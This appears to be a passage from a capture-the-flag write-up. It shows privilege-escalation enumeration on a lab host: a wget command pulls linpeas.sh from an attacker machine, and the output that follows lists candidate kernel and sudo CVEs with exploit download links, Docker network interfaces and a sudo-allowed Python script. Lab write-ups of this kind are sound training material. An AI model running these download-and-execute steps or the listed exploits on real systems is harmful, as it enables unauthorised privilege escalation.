PEAS
john@cybermonday:/dev/shm$ wget -q http://10.10.14.12/linpeas.sh ; chmod 755 /dev/shm/linpeas.shDelivery complete
 Executing PEAS
Executing PEAS
CVEs
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops
 
   Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
   Exposure: probable
   Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
   Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
 
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: ubuntu=(20.04|21.04),[ debian=11 ]
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-2586] nft_object UAF
 
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loadedNetworks

br-ccc51e38e8e5: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        inet6 fe80::42:4ff:fe8f:b77d  prefixlen 64  scopeid 0x20<link>
        ether 02:42:04:8f:b7:7d  txqueuelen 0  (Ethernet)
        RX packets 67966  bytes 205003264 (195.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 69764  bytes 18942194 (18.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:3d:79:dd:12  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.228  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:3075  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:3075  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:30:75  txqueuelen 1000  (Ethernet)
        RX packets 84074  bytes 27010607 (25.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 79299  bytes 207663138 (198.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth7852bd0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::3c76:7cff:fefb:a7c6  prefixlen 64  scopeid 0x20<link>
        ether 3e:76:7c:fb:a7:c6  txqueuelen 0  (Ethernet)
        RX packets 246  bytes 35775 (34.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 309  bytes 28781 (28.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth8ad9cb1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::10ae:a3ff:fe49:e227  prefixlen 64  scopeid 0x20<link>
        ether 12:ae:a3:49:e2:27  txqueuelen 0  (Ethernet)
        RX packets 68434  bytes 205921257 (196.3 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 79778  bytes 218414126 (208.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth93cc5cb: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::c429:2cff:fe0e:a1ca  prefixlen 64  scopeid 0x20<link>
        ether c6:29:2c:0e:a1:ca  txqueuelen 0  (Ethernet)
        RX packets 12532  bytes 199615883 (190.3 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2565  bytes 176788 (172.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
vetha272285: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::745f:42ff:fe01:1902  prefixlen 64  scopeid 0x20<link>
        ether 76:5f:42:01:19:02  txqueuelen 0  (Ethernet)
        RX packets 2290  bytes 224446 (219.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2377  bytes 168859 (164.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
vethc28fe1a: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::18bd:17ff:feab:17a4  prefixlen 64  scopeid 0x20<link>
        ether 1a:bd:17:ab:17:a4  txqueuelen 0  (Ethernet)
        RX packets 698  bytes 1190135 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1124  bytes 1195217 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
vethc5b3571: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::e8e4:89ff:fe2f:a82  prefixlen 64  scopeid 0x20<link>
        ether ea:e4:89:2f:0a:82  txqueuelen 0  (Ethernet)
        RX packets 143  bytes 15751 (15.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 157  bytes 18132 (17.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0Additional Network information, some of which are relevant to the Docker containers
sudo privileges
 PEAS also picked up the sudo privileges of the
PEAS also picked up the sudo privileges of the john user
/opt
 This must be the Python script for the sudo privileges;
This must be the Python script for the sudo privileges;/opt/secure_compose.py